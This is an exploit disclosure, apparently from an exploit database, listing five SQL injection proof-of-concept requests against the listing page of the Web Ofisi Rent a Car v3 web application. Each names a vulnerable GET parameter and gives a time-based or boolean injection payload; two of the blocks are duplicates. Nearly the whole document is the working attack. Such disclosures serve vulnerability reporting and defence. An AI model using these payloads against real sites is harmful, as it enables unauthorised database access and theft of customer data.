Share
# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection
# Date: 2019-07-19
# Exploit Author: Ahmet รœmit BAYRAM
# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html
# Demo Site: http://demobul.net/rentacarv3/
# Version: v3
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: kategori[] (GET)
Payload: if(now()=sysdate(),sleep(0),0)

----- PoC 2: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: klima[] (GET)
Payload: 1 AND 3*2*1=6 AND 695=695

----- PoC 3: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: vites[] (GET)
Payload: 1 AND 3*2*1=6 AND 499=499

----- PoC 4: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: vites[] (GET)
Payload: 1 AND 3*2*1=6 AND 499=499

----- PoC 5: SQLi -----

Request:
http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
Vulnerable Parameter: yakit[] (GET)
Payload: 1 AND 3*2*1=6 AND 602=602